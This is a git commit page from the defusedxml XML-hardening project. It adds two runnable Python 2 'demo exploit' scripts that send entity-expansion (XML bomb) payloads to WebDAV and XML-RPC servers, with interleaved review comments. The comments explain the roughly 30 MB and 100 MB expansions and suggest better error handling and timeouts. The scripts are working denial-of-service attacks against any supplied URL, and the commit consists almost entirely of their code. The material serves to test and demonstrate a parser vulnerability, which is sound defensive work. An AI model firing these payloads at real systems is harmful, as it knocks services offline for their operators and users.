authorChristian Heimes <christian@python.org>2013-02-25 00:48:53 +0100
committerChristian Heimes <christian@python.org>2013-02-25 00:48:53 +0100
commit2d313278fbf41bc8758611efe0a4ef047e87c3be (patch)
tree392d58fa980dbd53ad76fd01b85c7fd382336a96
parent3c27267f6ea6f64a97283ac34da803378643e58b (diff)
downloaddefusedxml-git-2d313278fbf41bc8758611efe0a4ef047e87c3be.tar.gz
add demo exploits for webdav and xmlrpc
-rwxr-xr-xother/exploit_webdav.py44
-rwxr-xr-xother/exploit_xmlrpc.py40
2 files changed, 84 insertions, 0 deletions
diff --git a/other/exploit_webdav.py b/other/exploit_webdav.py
new file mode 100755
index 0000000..3288c28
--- /dev/null
+++ b/other/exploit_webdav.py
@@ -0,0 +1,44 @@
+#!/usr/bin/python
+"""Demo exploit for WebDAV DoS attack
+
+Author: Christian Heimes
+"""
+import sys
+import base64
+import urlparse
+import httplib
+
+if len(sys.argv) != 2:
+ sys.exit("{} http://user:password@host:port/".format(sys.argv[0]))
+
+url = urlparse.urlparse(sys.argv[1])
+
+xml = """<?xml version='1.0'?>
+<!DOCTYPE bomb [
+<!ENTITY a "VALUE">
+]>
+ <propfind xmlns="DAV:">
+ <prop>QUAD
+ <supported-live-property-set/>
+ <supported-method-set/>
+ </prop>
+</propfind>
+"""
+
+xml = xml.replace("VALUE", "a" * 30000)
+xml = xml.replace("QUAD", "&a;" * 1000)
+
+headers = {
+ "Content-Type": "text/xml",
+ "Content-Length": len(xml),
+ "Depth": 1,
+ }
+
+if url.username:
+ auth = base64.b64encode(":".join((url.username, url.password)))
+ headers["Authorization"] = "Basic %s" % auth
+
+con = httplib.HTTPConnection(url.hostname, int(url.port))
+con.request("PROPFIND", url.path, body=xml, headers=headers)
+res = con.getresponse()
+print(res.read())
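Review bot: The module docstring at the top of the hunk names the attack class but not the payload the script sends or the outcome a reader should expect, which is what someone using it to confirm a mitigation needs. The body builds one 30,000-byte entity and references it 1,000 times inside the PROPFIND body, so a parser without entity-expansion limits materialises roughly 30 MB from a request of about 33 KB; a docstring line such as `Sends a PROPFIND whose body expands one 30 kB entity 1000 times (~30 MB); a server with entity-expansion limits should refuse it` makes that explicit. It would also help to state that the script is Python 2 only (urlparse, httplib) and that the URL must include both a port and a password, since `int(url.port)` and the `":".join((url.username, url.password))` on the Authorization line raise TypeError when either is missing. other/exploit_xmlrpc.py in the second hunk has the same documentation gap (100 kB entity, 1000 references, about 100 MB expanded).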
diff --git a/other/exploit_xmlrpc.py b/other/exploit_xmlrpc.py
new file mode 100755
index 0000000..da8e8d0
--- /dev/null
+++ b/other/exploit_xmlrpc.py
@@ -0,0 +1,40 @@
+#!/usr/bin/python
+"""Demo exploit for XML-RPC DoS attack
+
+Author: Christian Heimes
+"""
+import sys
+import urllib2
+
+if len(sys.argv) != 2:
+ sys.exit("{} url".format(sys.argv[0]))
+
+url = sys.argv[1]
+
+xml = """<?xml version='1.0'?>
+<!DOCTYPE bomb [
+<!ENTITY a "VALUE">
+]>
+<methodCall>
+<methodName>system.methodSignature</methodName>
+<params>
+<param>
+<value><string>QUAD</string></value>
+</param>
+</params>
+</methodCall>
+"""
+
+xml = xml.replace("VALUE", "a" * 100000)
+xml = xml.replace("QUAD", "&a;" * 1000)
+
+headers = {"Content-Type": "text/xml", "Content-Length": len(xml)}
+
+req = urllib2.Request(url, data=xml, headers=headers)
+
+print("Sending request to {}".format(url))
+
+resp = urllib2.urlopen(req)
+
+print("Response")
+print(resp.read())
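Review bot: `urllib2.urlopen(req)` on the second-to-last line raises urllib2.HTTPError for any non-2xx status, so a server that correctly rejects the expansion payload (the outcome this demo exists to check) ends the script with a traceback instead of the `Response` output, while a server that stalls on the payload blocks the call indefinitely because no timeout is passed. Wrapping the call keeps both outcomes readable: `try: resp = urllib2.urlopen(req, timeout=TIMEOUT_SECONDS)` / `except urllib2.HTTPError as e: sys.exit("Rejected with status {}".format(e.code))`, with TIMEOUT_SECONDS a constant chosen for the test environment. The script is also Python 2 only (urllib2), which the docstring could state alongside the payload description.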